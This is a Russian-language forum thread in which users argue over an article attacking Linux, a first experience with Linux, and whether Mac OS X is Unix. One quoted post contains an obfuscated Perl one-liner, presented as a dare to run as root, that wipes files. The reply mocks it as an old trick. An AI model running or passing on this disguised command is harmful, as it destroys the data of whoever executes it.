Цитата .ExeRun:
"Неправильное изложение фактов" - языком трепать легко, а что конкретно неправильно там изложено? »
|
Предлагаешь мне расставить каменты?
Нет, как-то не хочется. И дело не в том, что языком трепать легко, а в том, что автор реально делает неправильные выводы, к Linuxу зачастую имеющие слабые отношения. Коментировать изначально неправильные 28 причин, разбирать статью, в основание которой положено невежество? ни-ха-чу! (Или все же, убив полдня, раскрыть тебе глаза на мир?)
Цитата .ExeRun:
Вдобавок, в использование консоли заключается серьезная опасность. Попробуйте запустить следующий скрипт с правами root.
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' »
|
Знаете сколько этой байке лет?
Это сродни, "А вы попробуйте в трасформаторную будку залезть, вас на таааак Токнет! "
Это как пластмассовые пассатижы, ими ничего не открутишь, зато и палец не прищимишь. А если в руки нормальный инструмент попался, то неча на зеркало пинять
Цитата .ExeRun:
Сколько случаев знаю, на форуме где идет холивар, народ решается попробовать линукс, но в итоге сносит его. Ибо УГ полное. »
|
Не сказать что мое первое знакомство протекало гладко, скорей даже с рвтоным рефлексом, но потом, почитав, попробовав, вникнув, и поняв свои ошибки, я считаю Linux более грамотной, логичной и понятной системой. Был бы доступ к интернету.
Цитата .ExeRun:
А то что я скопипастил - чистейшая правда. Ну РАЗУМЕЕТСЯ линуксойды не признают это, ведь правда глаза режет »
|
Правда? Она там действительно есть? Ну кроме фактов, которыми якобы подтверждается убогость Linuxa. Я рассматривал статью как таковую, худо-бедно, но зная Линукс. Статья - чушь. И в моих постах нет агрессии, или чего-либо колкого(по крайней мере, я на это надеюсь) я просто констатирую факт. В статье нет ни одного полного примера, который можно было бы воспроизвести.
Цитата Ne1m:
Я все равно считаю Mac Os X юникс системой, что бы не писали так оно и есть. »
|
А оно дествительно так и есть.
Almanax, прав на все 100!